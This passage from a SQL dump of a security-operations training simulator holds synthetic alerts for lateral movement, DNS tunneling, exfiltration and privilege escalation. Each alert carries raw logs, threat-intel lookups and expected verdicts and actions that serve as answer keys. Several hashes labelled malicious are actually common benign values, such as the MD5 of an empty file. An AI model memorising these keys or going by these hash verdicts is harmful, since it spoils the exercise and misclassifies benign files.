'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(580, 'Unauthorized User Account Activity', 'high', 'User Authentication Logs', 'An attacker is using compromised credentials to move laterally across the network, attempting to access additional sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:12:55Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"target_domain\":\"INTERNALCORP\",\"target_username\":\"jdoe\",\"logon_guid\":\"{3E7EAB11-4C7A-4D7D-BB8D-ED7BE3AB1A8A}\",\"source_port\":\"52435\",\"status\":\"Success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"additional_info\":{\"filename\":\"compromised_document.docx\"}}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential credential compromise\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(581, 'Anomalous File Access Patterns', 'medium', 'File Access Logs', 'During routine monitoring, anomalous access patterns were detected on the file server. An external IP address was observed accessing multiple files containing sensitive information, potentially as a reconnaissance activity to identify valuable data for exfiltration.', 'Reconnaissance', 'T1592 - Gather Victim Host Information', 1, 'Closed', 259, '{\"timestamp\":\"2023-10-11T14:25:37Z\",\"event_type\":\"file_access\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"file_accessed\":[\"/finance/2023_budgets.xlsx\",\"/hr/employee_records.docx\",\"/legal/contracts/nda.pdf\"],\"file_hash\":[\"5f4dcc3b5aa765d61d8327deb882cf99\",\"098f6bcd4621d373cade4e832627b4f6\",\"e99a18c428cb38d5f260853678922e03\"],\"access_method\":\"smb\",\"action\":\"read\"}', '2026-01-08 22:06:19', '2026-03-07 19:27:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known reconnaissance activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/finance/2023_budgets.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive financial document accessed\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/hr/employee_records.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive HR document accessed\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/legal/contracts/nda.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive legal document accessed\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(582, 'DNS Tunneling Suspected', 'high', 'DNS Query Logs', 'A DNS tunneling technique has been detected, indicating potential command and control activities. The attacker is using DNS queries to maintain communication with compromised systems.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"source_ip\":\"10.2.3.15\",\"destination_ip\":\"203.0.113.45\",\"queried_domain\":\"malicious.example.com\",\"dns_query_type\":\"TXT\",\"dns_response\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_host\":\"compromised-host.local\",\"username\":\"jdoe\",\"unique_transaction_id\":\"1234567890abcdef\",\"detected_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_filename\":\"dns_tunnel_tool.exe\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DNS Threat List\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DNS tunneling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DNS tunneling tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dns_tunnel_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"File detected as DNS tunneling executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(583, 'Encrypted Traffic Anomaly', 'high', 'SSL/TLS Traffic Inspection', 'Anomalous encrypted traffic was detected, indicating potential data exfiltration activities. The attacker is leveraging SSL/TLS channels to evade detection.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:45Z\",\"source_ip\":\"192.168.1.22\",\"destination_ip\":\"203.0.113.45\",\"ssl_subject\":\"CN=malicious-actor.com\",\"ssl_issuer\":\"CN=Let\'s Encrypt Authority X3\",\"data_volume\":\"5GB\",\"file_hash\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"filename\":\"encrypted_payload.bin\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"protocol\":\"TLSv1.2\",\"alert_id\":\"EXFIL-2023-0008\",\"user_agent\":\"curl/7.68.0\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected during traffic inspection.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User is registered and active within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(584, 'Privileged Account Escalation Attempt', 'high', 'Privilege Access Management Logs', 'An attempt was detected where an attacker tried to escalate privileges to access restricted areas of the network and sensitive data. This is an intermediate level attempt at privilege escalation.', 'Privilege Escalation', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":4625,\"event_type\":\"Audit Failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"username\":\"john_doe\",\"domain\":\"CORP\",\"logon_type\":10,\"status\":\"0xC000006A\",\"sub_status\":\"0xC0000064\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"attempted_action\":\"Privilege Escalation\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal machine targeted for privilege escalation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Existing user attempting unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit 